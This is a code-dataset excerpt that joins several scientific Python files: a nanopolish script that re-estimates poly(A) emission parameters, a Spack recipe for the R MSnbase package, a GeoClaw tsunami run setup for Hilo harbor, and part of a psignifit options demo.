* `samples.new.tsv` is the output of `nanopolish polya -vv [...] | grep 'polya-samples'`,
generated by the **new** kmer models.
Dependencies:
* numpy >= 1.11.2
* scipy >= 0.18.1
* sklearn >= 0.18.1
"""
import csv
import numpy as np
import argparse
import os
from scipy.stats import norm
from sklearn.mixture import GaussianMixture
log_inv_sqrt_2pi = np.log(0.3989422804014327)
def log_normal_pdf(xs, mu, sigma):
    """Evaluate the log of the Normal(mu, sigma) density at the sample(s) xs."""
    z = (xs - mu) * np.reciprocal(sigma)
    return log_inv_sqrt_2pi - np.log(sigma) - 0.5 * z * z
def fit_gaussian(samples):
    """Fit a normal distribution to the samples; return its (mu, sigma)."""
    return norm.fit(samples)
def fit_gmm(samples, ncomponents=2):
    """Fit an n-component Gaussian mixture; return [(weight, mu, var), ...]."""
    # sklearn expects a 2-D design matrix: unsqueeze (NSAMPLES,) -> (NSAMPLES, 1).
    gmm = GaussianMixture(n_components=ncomponents)
    gmm.fit(samples.reshape(-1, 1))
    params = []
    for c in range(ncomponents):
        params.append((gmm.weights_[c], gmm.means_[c][0], gmm.covariances_[c][0][0]))
    return params
def old_tsv_to_numpy(tsv_path):
    """
    Read a polya-samples TSV (old kmer model) into per-region log-likelihoods.

    Returns a dictionary of numpy float arrays:
    * S_loglkhd: log-likelihoods of samples in the START segment.
    * L_loglkhd: log-likelihoods of samples in the LEADER segment.
    * A_loglkhd: log-likelihoods of samples in the ADAPTER segment.
    * P_loglkhd: log-likelihoods of samples in the POLYA segment.
    * T_loglkhd: log-likelihoods of samples in the TRANSCRIPT segment.
    """
    # Removed the unused `str2int` mapping (dead code). Each region label is
    # paired with the column holding that region's log-likelihood; only the
    # relevant column is parsed per row.
    region_to_col = {'START': 's_llh', 'LEADER': 'l_llh', 'ADAPTER': 'a_llh',
                     'POLYA': 'p_llh', 'TRANSCRIPT': 't_llh'}
    loglkhds = {region: [] for region in region_to_col}
    headers = ['tag', 'read_id', 'chr', 'idx', 'sample', 'scaled_sample',
               's_llh', 'l_llh', 'a_llh', 'p_llh', 'c_llh', 't_llh', 'region']
    with open(tsv_path, 'r') as f:
        rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
        for row in rdr:
            region = row['region']
            if region in region_to_col:
                loglkhds[region].append(float(row[region_to_col[region]]))
    return {"S_loglkhd": np.array(loglkhds['START'], dtype=float),
            "L_loglkhd": np.array(loglkhds['LEADER'], dtype=float),
            "A_loglkhd": np.array(loglkhds['ADAPTER'], dtype=float),
            "P_loglkhd": np.array(loglkhds['POLYA'], dtype=float),
            "T_loglkhd": np.array(loglkhds['TRANSCRIPT'], dtype=float)}
def make_segmentation_dict(segmentations_tsv_path):
    """
    Load a polya-segmentation TSV into {read_id: boundary-index dict}.

    Each value holds the integer sample indices 'L_start', 'A_start',
    'P_start', 'P_end'. Only the first segmentation seen for each read id is
    kept; later rows for the same read id are ignored.
    """
    segments = {}
    headers = ['tag', 'read_id', 'pos', 'L_start', 'A_start', 'P_start', 'P_end', 'rate', 'plen', 'alen']
    with open(segmentations_tsv_path, 'r') as f:
        rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
        for row in rdr:
            # O(1) dict membership test; the previous `not in
            # list(segments.keys())` rebuilt an O(n) list on every row.
            if row['read_id'] not in segments:
                # Boundaries are written as floats (e.g. "47.0"); go through
                # float() before int() to parse them.
                segments[row['read_id']] = {'L_start': int(float(row['L_start'])),
                                            'A_start': int(float(row['A_start'])),
                                            'P_start': int(float(row['P_start'])),
                                            'P_end': int(float(row['P_end']))}
    return segments
def region_search(read_id, sample_ix, segmentations):
    """
    Look up which segment region a (read, sample index) pair falls into,
    given a dictionary of ("gold-standard") segmentations.

    `read_id` may be a prefix of the full read id keys in `segmentations`.
    Returns an integer label:
        0 => START, 1 => LEADER, 2 => ADAPTER, 3 => POLYA,
        5 => TRANSCRIPT, 6 => UNKNOWN (read not found).
    (Label 4 is reserved for CLIFF regions, which have a uniform
    distribution and are not tracked here.)
    """
    # Find the read ID by prefix match; stop at the first hit instead of
    # scanning every key.
    read_key = None
    for long_read_id in segmentations:
        if long_read_id.startswith(read_id):
            read_key = long_read_id
            break
    if read_key is None:
        return 6
    seg = segmentations[read_key]
    # Boundaries partition the sample axis left-to-right; note POLYA's end
    # index is inclusive.
    if sample_ix < seg['L_start']:
        return 0
    if sample_ix < seg['A_start']:
        return 1
    if sample_ix < seg['P_start']:
        return 2
    if sample_ix <= seg['P_end']:
        return 3
    return 5
def new_tsv_to_numpy(tsv_path, segmentations):
    """
    Read a polya-samples TSV from the new kmer model and bucket the scaled
    samples by region, using the (gold-standard) segmentations from the old
    model to decide which region each sample index belongs to.

    Args:
    * tsv_path: path to a TSV generated by `nanopolish polya -vv [...]`.
    * segmentations: dict of segmentation intervals (see make_segmentation_dict).

    Returns: dict of numpy float arrays keyed by
    S_samples/L_samples/A_samples/P_samples/T_samples.
    """
    # Region labels from region_search: 0=START, 1=LEADER, 2=ADAPTER,
    # 3=POLYA, 5=TRANSCRIPT; label 6 (UNKNOWN) is dropped, as before.
    # (Also removed the unused local `contig`.)
    buckets = {0: [], 1: [], 2: [], 3: [], 5: []}
    headers = ['tag', 'read_id', 'chr', 'idx', 'sample', 'scaled_sample',
               's_llh', 'l_llh', 'a_llh', 'p_llh', 'c_llh', 't_llh', 'region']
    with open(tsv_path, 'r') as f:
        rdr = csv.DictReader(f, delimiter='\t', quoting=csv.QUOTE_NONE, fieldnames=headers)
        for row in rdr:
            region = region_search(row['read_id'], int(row['idx']), segmentations)
            if region in buckets:
                buckets[region].append(float(row['scaled_sample']))
    return {"S_samples": np.array(buckets[0], dtype=float),
            "L_samples": np.array(buckets[1], dtype=float),
            "A_samples": np.array(buckets[2], dtype=float),
            "P_samples": np.array(buckets[3], dtype=float),
            "T_samples": np.array(buckets[5], dtype=float)}
def main(old_samples_tsv, old_segmentations_tsv, new_samples_tsv, benchmark=True):
    """
    Infer and print the new values for mu and sigma (for each of S, L, A, P, T) to STDOUT.

    Args:
    * old_samples_tsv: path to TSV file containing polya-samples data from an older kmer model.
    * old_segmentations_tsv: path to TSV file containing polya-segmentation data from an older kmer model.
    * new_samples_tsv: path to TSV file containing polya-samples data from the newer kmer model.
    * benchmark: if True, also print the average emission log-likelihoods of the
      old parameters vs. the newly fitted ones, for comparison.

    Returns: N/A, prints outputs to STDOUT.
    """
    ### read all samples into numpy arrays:
    print("Loading data from TSV...")
    old_data = old_tsv_to_numpy(old_samples_tsv)
    segmentations = make_segmentation_dict(old_segmentations_tsv)
    new_data = new_tsv_to_numpy(new_samples_tsv, segmentations)
    print("... Datasets loaded.")

    ### infer best possible new mu,sigma for each of S, L, A, P, T:
    # S, L, P are fit with single gaussians; A and T with 2-component mixtures.
    # NOTE: the second value of each gaussian fit is printed as `var` below and
    # its square root as `stdv`, i.e. it is treated as a variance.
    print("Fitting gaussians to new scaled samples (this may take a while)...")
    new_mu_S, new_sigma_S = fit_gaussian(new_data['S_samples'])
    new_mu_L, new_sigma_L = fit_gaussian(new_data['L_samples'])
    (new_pi0_A, new_mu0_A, new_sig0_A), (new_pi1_A, new_mu1_A, new_sig1_A) = fit_gmm(new_data['A_samples'], ncomponents=2)
    new_mu_P, new_sigma_P = fit_gaussian(new_data['P_samples'])
    (new_pi0_T, new_mu0_T, new_sig0_T), (new_pi1_T, new_mu1_T, new_sig1_T) = fit_gmm(new_data['T_samples'], ncomponents=2)

    ### print to stdout:
    print("New params for START: mu = {0}, var = {1}, stdv = {2}".format(new_mu_S, new_sigma_S, np.sqrt(new_sigma_S)))
    print("New params for LEADER: mu = {0}, var = {1}, stdv = {2}".format(new_mu_L, new_sigma_L, np.sqrt(new_sigma_L)))
    print("New params for ADAPTER0: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi0_A, new_mu0_A, new_sig0_A, np.sqrt(new_sig0_A)))
    print("New params for ADAPTER1: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi1_A, new_mu1_A, new_sig1_A, np.sqrt(new_sig1_A)))
    print("New params for POLYA: mu = {0}, var = {1}, stdv = {2}".format(new_mu_P, new_sigma_P, np.sqrt(new_sigma_P)))
    print("New params for TRANSCR0: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi0_T, new_mu0_T, new_sig0_T, np.sqrt(new_sig0_T)))
    print("New params for TRANSCR1: pi = {0}, mu = {1}, var = {2}, stdv = {3}".format(new_pi1_T, new_mu1_T, new_sig1_T, np.sqrt(new_sig1_T)))

    ### optionally, benchmark:
    if not benchmark:
        return
    print("===== Emission Log-Likelihood Benchmarks =====")
    # For single-gaussian regions: mean log-density under the new fit.
    old_S_llh = np.mean(old_data['S_loglkhd'])
    new_S_llh = np.mean(norm.logpdf(new_data['S_samples'], loc=new_mu_S, scale=np.sqrt(new_sigma_S)))
    print("> Average START log-probs:")
    print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_S_llh, new_S_llh))
    old_L_llh = np.mean(old_data['L_loglkhd'])
    new_L_llh = np.mean(norm.logpdf(new_data['L_samples'], loc=new_mu_L, scale=np.sqrt(new_sigma_L)))
    print("> Average LEADER log-probs:")
    print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_L_llh, new_L_llh))
    # For mixture regions: log(pi0 * N0(x) + pi1 * N1(x)), averaged over samples.
    old_A_llh = np.mean(old_data['A_loglkhd'])
    new_A_llh0 = new_pi0_A * norm.pdf(new_data['A_samples'], loc=new_mu0_A, scale=np.sqrt(new_sig0_A))
    new_A_llh1 = new_pi1_A * norm.pdf(new_data['A_samples'], loc=new_mu1_A, scale=np.sqrt(new_sig1_A))
    new_A_llh = np.mean(np.log(new_A_llh0 + new_A_llh1))
    print("> Average ADAPTER log-probs:")
    print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_A_llh, new_A_llh))
    old_P_llh = np.mean(old_data['P_loglkhd'])
    new_P_llh = np.mean(norm.logpdf(new_data['P_samples'], loc=new_mu_P, scale=np.sqrt(new_sigma_P)))
    print("> Average POLYA log-probs:")
    print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_P_llh, new_P_llh))
    old_T_llh = np.mean(old_data['T_loglkhd'])
    new_T_llh0 = new_pi0_T * norm.pdf(new_data['T_samples'], loc=new_mu0_T, scale=np.sqrt(new_sig0_T))
    new_T_llh1 = new_pi1_T * norm.pdf(new_data['T_samples'], loc=new_mu1_T, scale=np.sqrt(new_sig1_T))
    new_T_llh = np.mean(np.log(new_T_llh0 + new_T_llh1))
    print("> Average TRANSCRIPT log-probs:")
    print("> Old avg. log-likelihood: {0} | New avg. log-likelihood: {1}".format(old_T_llh, new_T_llh))
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Infer new Poly(A) emission parameters.")
    parser.add_argument("old_samples_tsv", help="Path to TSV file of old samples.")
    parser.add_argument("segmentation_tsv", help="Path to segmentations for reads.")
    parser.add_argument("new_samples_tsv", help="Path to TSV file of new samples.")
    # BUG FIX: `type=bool` is broken with argparse -- bool("False") == True, so
    # `--benchmark=False` could never actually disable benchmarking.  Parse the
    # string explicitly instead (anything but false/no/0 counts as True).
    parser.add_argument("--benchmark", default=True,
                        type=lambda s: s.strip().lower() not in ('false', 'no', '0'),
                        dest="benchmark",
                        help="If `--benchmark=False`, don't benchmark the new estimated HMM parameters.")
    args = parser.parse_args()
    # sanity checks: fail fast (with the offending path) if an input is missing
    for _path in (args.old_samples_tsv, args.segmentation_tsv, args.new_samples_tsv):
        assert os.path.exists(_path), "missing input file: {0}".format(_path)
    # run inference and (optional) benchmarking of new parameters:
    main(args.old_samples_tsv, args.segmentation_tsv, args.new_samples_tsv, benchmark=args.benchmark)
| jts/nanopolish | scripts/reestimate_polya_emissions.py | Python | mit | 13,740 | [
"Gaussian"
] | 7b656364ccb05d5fcb02a4d23199ffcc07713304a3f6fc1b5f335ba49331e57f |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RMsnbase(RPackage):
    """Manipulation, processing and visualisation of mass spectrometry and
    proteomics data."""

    # Bioconductor landing page and canonical git repository for MSnbase.
    homepage = "https://www.bioconductor.org/packages/MSnbase/"
    git = "https://git.bioconductor.org/packages/MSnbase.git"

    # Pin version 2.2.0 to its exact Bioconductor release commit.
    version('2.2.0', commit='d6e8fb7f106d05096fa9074da0f829ac8f02c197')

    # R package dependencies, needed at both build and run time.
    depends_on('r-biocgenerics', type=('build', 'run'))
    depends_on('r-biobase', type=('build', 'run'))
    depends_on('r-mzr', type=('build', 'run'))
    depends_on('r-biocparallel', type=('build', 'run'))
    depends_on('r-protgenerics', type=('build', 'run'))
    depends_on('r-plyr', type=('build', 'run'))
    depends_on('r-iranges', type=('build', 'run'))
    depends_on('r-preprocesscore', type=('build', 'run'))
    depends_on('r-vsn', type=('build', 'run'))
    depends_on('r-affy', type=('build', 'run'))
    depends_on('r-impute', type=('build', 'run'))
    depends_on('r-pcamethods', type=('build', 'run'))
    depends_on('r-mzid', type=('build', 'run'))
    depends_on('r-maldiquant', type=('build', 'run'))
    depends_on('r-digest', type=('build', 'run'))
    depends_on('r-lattice', type=('build', 'run'))
    depends_on('r-ggplot2', type=('build', 'run'))
    depends_on('r-s4vectors', type=('build', 'run'))
    depends_on('r-xml', type=('build', 'run'))
    depends_on('r-rcpp', type=('build', 'run'))
    # MSnbase 2.2.0 is constrained to the R 3.4.x series.
    depends_on('r@3.4.0:3.4.9', when='@2.2.0')
| mfherbst/spack | var/spack/repos/builtin/packages/r-msnbase/package.py | Python | lgpl-2.1 | 2,662 | [
"Bioconductor"
] | b2eb4196704ee5c680465d5bfe7e1a7837d6769a7253ea085839a0b3d0c42297 |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------

    """
    Define the parameters used for running Clawpack.

    INPUT:
        claw_pkg expected to be "geoclaw" for this setrun.

    OUTPUT:
        rundata - object of class ClawRunData holding all run-time parameters
        (domain, AMR, gauges, output control, ...) for this run.

    """

    from clawpack.clawutil import data

    assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"

    num_dim = 2
    rundata = data.ClawRunData(claw_pkg, num_dim)

    #------------------------------------------------------------------
    # Problem-specific parameters to be written to setprob.data:
    #------------------------------------------------------------------

    #probdata = rundata.new_UserData(name='probdata',fname='setprob.data')

    #------------------------------------------------------------------
    # GeoClaw specific parameters:
    #------------------------------------------------------------------
    rundata = setgeo(rundata)

    #------------------------------------------------------------------
    # Standard Clawpack parameters to be written to claw.data:
    #------------------------------------------------------------------
    clawdata = rundata.clawdata  # initialized when rundata instantiated

    # Set single grid parameters first.
    # See below for AMR parameters.

    # ---------------
    # Spatial domain:
    # ---------------

    # Number of space dimensions:
    clawdata.num_dim = num_dim

    # Lower and upper edge of computational domain
    # (longitude/latitude, degrees):
    clawdata.lower[0] = 204.905      # xlower
    clawdata.upper[0] = 204.965      # xupper
    clawdata.lower[1] = 19.71        # ylower
    clawdata.upper[1] = 19.758       # yupper

    # Number of grid cells:
    clawdata.num_cells[0] = 108      # 2-sec  # mx
    clawdata.num_cells[1] = 88       # my

    # ---------------
    # Size of system:
    # ---------------

    # Number of equations in the system:
    clawdata.num_eqn = 3

    # Number of auxiliary variables in the aux array (initialized in setaux)
    clawdata.num_aux = 3

    # Index of aux array corresponding to capacity function, if there is one:
    clawdata.capa_index = 2

    # -------------
    # Initial time:
    # -------------

    clawdata.t0 = 0.0

    # Restart from checkpoint file of a previous run?
    # Note: If restarting, you must also change the Makefile to set:
    #    RESTART = True
    # If restarting, t0 above should be from original run, and the
    # restart_file 'fort.chkNNNNN' specified below should be in
    # the OUTDIR indicated in Makefile.

    clawdata.restart = False               # True to restart from prior results
    clawdata.restart_file = 'fort.chk00006'  # File to use for restart data

    # -------------
    # Output times:
    #--------------

    # Specify at what times the results should be written to fort.q files.
    # Note that the time integration stops after the final output time.

    clawdata.output_style = 1

    if clawdata.output_style == 1:
        # Output ntimes frames at equally spaced times up to tfinal:
        # Can specify num_output_times = 0 for no output
        clawdata.num_output_times = 14
        clawdata.tfinal = 7*3600.
        clawdata.output_t0 = True  # output at initial (or restart) time?

    elif clawdata.output_style == 2:
        # Specify a list or numpy array of output times:
        # Include t0 if you want output at the initial time.
        clawdata.output_times = 3600. * np.linspace(1, 4, 97)

    elif clawdata.output_style == 3:
        # Output every step_interval timesteps over total_steps timesteps:
        clawdata.output_step_interval = 1
        clawdata.total_steps = 10
        clawdata.output_t0 = False  # output at initial (or restart) time?

    clawdata.output_format = 'binary'      # 'ascii', 'binary', 'netcdf'

    clawdata.output_q_components = 'all'   # could be list such as [True,True]
    clawdata.output_aux_components = 'none'  # could be list
    clawdata.output_aux_onlyonce = True    # output aux arrays only at t0

    # ---------------------------------------------------
    # Verbosity of messages to screen during integration:
    # ---------------------------------------------------

    # The current t, dt, and cfl will be printed every time step
    # at AMR levels <= verbosity.  Set verbosity = 0 for no printing.
    # (E.g. verbosity == 2 means print only on levels 1 and 2.)
    clawdata.verbosity = 0

    # --------------
    # Time stepping:
    # --------------

    # if dt_variable==True:  variable time steps used based on cfl_desired,
    # if dt_variable==False: fixed time steps dt = dt_initial always used.
    clawdata.dt_variable = True

    # Initial time step for variable dt.
    # (If dt_variable==0 then dt=dt_initial for all steps)
    clawdata.dt_initial = 0.016

    # Max time step to be allowed if variable dt used:
    clawdata.dt_max = 1e+99

    # Desired Courant number if variable dt used
    clawdata.cfl_desired = 0.75
    # max Courant number to allow without retaking step with a smaller dt:
    clawdata.cfl_max = 1.0

    # Maximum number of time steps to allow between output times:
    clawdata.steps_max = 50000

    # ------------------
    # Method to be used:
    # ------------------

    # Order of accuracy:  1 => Godunov,  2 => Lax-Wendroff plus limiters
    clawdata.order = 2

    # Use dimensional splitting? (not yet available for AMR)
    clawdata.dimensional_split = 'unsplit'

    # For unsplit method, transverse_waves can be
    #  0 or 'none'      ==> donor cell (only normal solver used)
    #  1 or 'increment' ==> corner transport of waves
    #  2 or 'all'       ==> corner transport of 2nd order corrections too
    clawdata.transverse_waves = 2

    # Number of waves in the Riemann solution:
    clawdata.num_waves = 3

    # List of limiters to use for each wave family:
    # Required:  len(limiter) == num_waves
    # Some options:
    #   0 or 'none'     ==> no limiter (Lax-Wendroff)
    #   1 or 'minmod'   ==> minmod
    #   2 or 'superbee' ==> superbee
    #   3 or 'vanleer'  ==> van Leer
    #   4 or 'mc'       ==> MC limiter
    clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']

    clawdata.use_fwaves = True  # True ==> use f-wave version of algorithms

    # Source terms splitting:
    #   src_split == 0 or 'none'    ==> no source term (src routine never called)
    #   src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
    #   src_split == 2 or 'strang'  ==> Strang (2nd order) splitting used, not recommended.
    clawdata.source_split = 1

    # --------------------
    # Boundary conditions:
    # --------------------

    # Number of ghost cells (usually 2)
    clawdata.num_ghost = 2

    # Choice of BCs at xlower and xupper:
    #   0 or 'user'     => user specified (must modify bcNamr.f to use this option)
    #   1 or 'extrap'   => extrapolation (non-reflecting outflow)
    #   2 or 'periodic' => periodic (must specify this at both boundaries)
    #   3 or 'wall'     => solid wall for systems where q(2) is normal velocity
    clawdata.bc_lower[0] = 'extrap'  # at xlower
    clawdata.bc_upper[0] = 'extrap'  # at xupper
    clawdata.bc_lower[1] = 'extrap'  # at ylower
    clawdata.bc_upper[1] = 'user'    # at yupper

    # ---------------
    # Gauges:
    # ---------------
    gauges = rundata.gaugedata.gauges
    # for gauges append lines of the form  [gaugeno, x, y, t1, t2]
    gauges.append([1125, 204.91802, 19.74517, 0., 1.e9])  # Hilo
    gauges.append([1126, 204.93003, 19.74167, 0., 1.e9])  # Hilo
    # gauges.append([11261, 204.93003, 19.739, 0., 1.e9])
    # #Hilo
    # Tide gauge:
    gauges.append([7760, 204.9437, 19.7306, 0., 1.e9])  # Hilo
    gauges.append([7761, 204.9447, 19.7308, 0., 1.e9])  # From Benchmark descr.
    gauges.append([7762, 204.9437, 19.7307, 0., 1.e9])  # Shift so depth > 0

    # Gauge at point requested by Pat Lynett:
    gauges.append([3333, 204.93, 19.7576, 0., 1.e9])

    if 0:
        # Array of synthetic gauges originally used to find S2 location:
        dx = .0005
        for i in range(6):
            x = 204.93003 - i*dx
            for j in range(5):
                y = 19.74167 + (j-2)*dx
                gauges.append([10*(j+1)+i+1, x, y, 0., 1.e9])

    # --------------
    # Checkpointing:
    # --------------

    # Specify when checkpoint files should be created that can be
    # used to restart a computation.

    clawdata.checkpt_style = 0

    if clawdata.checkpt_style == 0:
        # Do not checkpoint at all
        pass

    elif clawdata.checkpt_style == 1:
        # Checkpoint only at tfinal.
        pass

    elif clawdata.checkpt_style == 2:
        # Specify a list of checkpoint times.
        clawdata.checkpt_times = np.array([7.5, 8, 8.5, 9, 9.5]) * 3600.

    elif clawdata.checkpt_style == 3:
        # Checkpoint every checkpt_interval timesteps (on Level 1)
        # and at the final time.
        clawdata.checkpt_interval = 5

    # ---------------
    # AMR parameters:   (written to amr.data)
    # ---------------
    amrdata = rundata.amrdata

    # max number of refinement levels:
    amrdata.amr_levels_max = 3

    # List of refinement ratios at each level (length at least amr_level_max-1)
    amrdata.refinement_ratios_x = [2, 3]
    amrdata.refinement_ratios_y = [2, 3]
    amrdata.refinement_ratios_t = [2, 3]

    # Specify type of each aux variable in amrdata.auxtype.
    # This must be a list of length num_aux, each element of which is one of:
    #   'center',  'capacity', 'xleft', or 'yleft'  (see documentation).
    amrdata.aux_type = ['center', 'capacity', 'yleft']

    # Flag for refinement based on Richardson error estimater:
    amrdata.flag_richardson = False    # use Richardson?
    amrdata.flag_richardson_tol = 1.0  # Richardson tolerance

    # Flag for refinement using routine flag2refine:
    amrdata.flag2refine = True       # use this?
    amrdata.flag2refine_tol = 0.5    # tolerance used in this routine
    # Note: in geoclaw the refinement tolerance is set as wave_tolerance below
    # and flag2refine_tol is unused!

    # steps to take on each level L between regriddings of level L+1:
    amrdata.regrid_interval = 3

    # width of buffer zone around flagged points:
    # (typically the same as regrid_interval so waves don't escape):
    amrdata.regrid_buffer_width = 2

    # clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
    # (closer to 1.0 => more small grids may be needed to cover flagged cells)
    amrdata.clustering_cutoff = 0.7

    # print info about each regridding up to this level:
    amrdata.verbosity_regrid = 0

    # ---------------
    # Regions:
    # ---------------
    # Region format: [minlevel, maxlevel, t1, t2, x1, x2, y1, y2]
    regions = rundata.regiondata.regions
    regions.append([1, 1, 0., 1e9, 0, 360, -90, 90])
    regions.append([1, 2, 0., 1e9, 204.9, 204.95, 19.7, 19.754])
    regions.append([1, 3, 0., 1e9, 204.9, 204.95, 19.7, 19.751])
    regions.append([1, 4, 0., 1e9, 204.9, 204.95, 19.72, 19.748])

    #  ----- For developers -----
    # Toggle debugging print statements:
    amrdata.dprint = False  # print domain flags
    amrdata.eprint = False  # print err est flags
    amrdata.edebug = False  # even more err est flags
    amrdata.gprint = False  # grid bisection/clustering
    amrdata.nprint = False  # proper nesting output
    amrdata.pprint = False  # proj. of tagged points
    amrdata.rprint = False  # print regridding summary
    amrdata.sprint = False  # space/memory output
    amrdata.tprint = False  # time step reporting each level
    amrdata.uprint = False  # update/upbnd reporting

    return rundata
    # end of function setrun
    # ----------------------
#-------------------
def setgeo(rundata):
#-------------------
    """
    Set GeoClaw specific runtime parameters.

    Args:
        rundata: a ClawRunData object; must carry a ``geo_data`` attribute
            (i.e. it was created with claw_pkg == 'geoclaw').

    Returns:
        the same rundata object, with its GeoClaw parameters filled in.

    Raises:
        AttributeError: if ``rundata`` has no ``geo_data`` attribute.
    """
    try:
        geo_data = rundata.geo_data
    except AttributeError:
        # BUG FIX: was a bare `except:`, which would also have swallowed
        # unrelated errors; also replaced the py2-only print statement.
        print("*** Error, this rundata has no geo_data attribute")
        raise AttributeError("Missing geo_data attribute")

    # == Physics ==
    geo_data.gravity = 9.81
    geo_data.coordinate_system = 2     # 2 => longitude-latitude coordinates
    geo_data.earth_radius = 6367500.0

    # == Forcing Options
    geo_data.coriolis_forcing = False

    # == Algorithm and Initial Conditions ==
    geo_data.sea_level = 0.
    geo_data.dry_tolerance = 0.001
    geo_data.friction_forcing = True
    geo_data.manning_coefficient = 0.025
    geo_data.friction_depth = 500.0

    # Refinement settings
    refinement_data = rundata.refinement_data
    refinement_data.variable_dt_refinement_ratios = True
    refinement_data.wave_tolerance = 0.02
    refinement_data.deep_depth = 200.0
    refinement_data.max_level_deep = 4

    # == settopo.data values ==
    # topofile format: [topotype, minlevel, maxlevel, t1, t2, fname]
    topofiles = rundata.topo_data.topofiles
    topodir = '../'
    topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'hilo_flattened.tt2'])
    topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'flat.tt2'])

    # == setdtopo.data values ==
    #rundata.dtopo_data.dtopofiles = [[1, 3, 3, topodir + 'Fujii.txydz']]

    # == setqinit.data values ==
    rundata.qinit_data.qinit_type = 0
    rundata.qinit_data.qinitfiles = []

    # == fixedgrids.data values ==
    rundata.fixed_grid_data.fixedgrids = []
    fixedgrids = rundata.fixed_grid_data.fixedgrids

    # == fgmax.data values ==
    fgmax_files = rundata.fgmax_data.fgmax_files
    # for fixed grids append to this list names of any fgmax input files
    fgmax_files.append('fgmax_grid.txt')
    rundata.fgmax_data.num_fgmax_val = 2

    return rundata
    # end of function setgeo
    # ----------------------
if __name__ == '__main__':
    # Set up run-time parameters and write all data files.
    import sys
    rundata = setrun(*sys.argv[1:])
    rundata.write()

    # Also export Google-Earth overlays of the refinement regions and gauges.
    from clawpack.geoclaw import kmltools
    kmltools.regions2kml()
    kmltools.gauges2kml()
| xinshengqin/tsunami_benchmarks | nthmp_currents_2015/problem2/harbor1/setrun.py | Python | bsd-3-clause | 14,360 | [
"NetCDF"
] | 0184c75151e25413929aa01cad8c24c38c137af14d6b29867e3d38680c20423c |
# -*- coding: utf-8 -*-
"""
DEMO_002 OPTION DICTIONARY
Which options can one set?
This demo explains all fields of the options dictionary, e.g. which options
you can set for the fitting process as a user.
"""
from numpy import array, exp
from psignifit.psignifit import psignifit
# to have some data we use the data from demo_001
data = array([[0.0010, 45.0000, 90.0000],
[0.0015, 50.0000, 90.0000],
[0.0020, 44.0000, 90.0000],
[0.0025, 44.0000, 90.0000],
[0.0030, 52.0000, 90.0000],
[0.0035, 53.0000, 90.0000],
[0.0040, 62.0000, 90.0000],
[0.0045, 64.0000, 90.0000],
[0.0050, 76.0000, 90.0000],
[0.0060, 79.0000, 90.0000],
[0.0070, 88.0000, 90.0000],
[0.0080, 90.0000, 90.0000],
[0.0100, 90.0000, 90.0000]])
# initializing options dictionary
options = dict()
# now or at any later time you can run a fit with this command.
res=psignifit(data,options)
""" list of options fields """
''' Here we list all fields of the option dictionary which can be accessed by
options['fieldname'] = default Value
afterwards follows some explanation and allowed values '''
""" options['sigmoidName'] = 'norm' """
''' This sets the type of sigmoid you fit to your data. '''
# The default value 'norm' fits a cumulative Gaussian to your data.
options['sigmoidName'] = 'norm'
#another standard alternative is the logistic function
options['sigmoidName'] = 'logistic'
# For data on a logscale you may want to fit a log-normal distribution or a
# Weibull, which you invoke with:
options['sigmoidName'] = 'logn'
# or
options['sigmoidName'] = 'weibull'
# We also included the gumbel and reversed gumbel functions for asymmetric
# psychometric functions. The gumbel has a longer lower tail the reversed
# gumbel a longer upper tail.
options['sigmoidName'] = 'gumbel'
# or
options['sigmoidName'] = 'rgumbel'
# for a heavy tailed distribution use
options['sigmoidName'] = 'tdist'
""" options['sigmoidHandle'] """
''' Here you may provide a handle to your own sigmoid which takes two
parameters as input and hands back a function value. This should be
vectorized or even a formula.
However, this is usually obtained from options['sigmoidName']
This is needed if you want to use your own sigmoid, which is not built in '''
""" options['expType'] = 'YesNo' """
''' This sets which parameters you want to be free and which you fix and to
which values, for standard experiment types. '''
# 'YesNo', default sets all parameters free, which is suitable for a standard
# yes/no paradigm.
options['expType'] = 'YesNo'
# '2AFC', fixes the lower asymptote to .5 and fits the rest, for 2
# alternative forced choice experiments.
options['expType'] = '2AFC'
# 'nAFC', fixes the lower asymptote to 1/n and fits the rest. For this type
# of experiment you MUST also provide options['expN'] the number of
# alternatives.
# As an example with 3 alternatives:
options['expType'] = 'nAFC'
options['expN'] = 3
""" options['estimateType'] = 'mean' """
''' How you want to estimate your fit from the posterior '''
# 'MAP' The MAP estimator is the maximum a posteriori computed from
# the posterior.
options['estimateType'] = 'MAP'
# 'mean' The posterior mean. In a Bayesian sense a more suitable estimate.
# the expected value of the Posterior.
options['estimateType'] = 'mean'
""" options['stepN'] = [40,40,20,20,20]
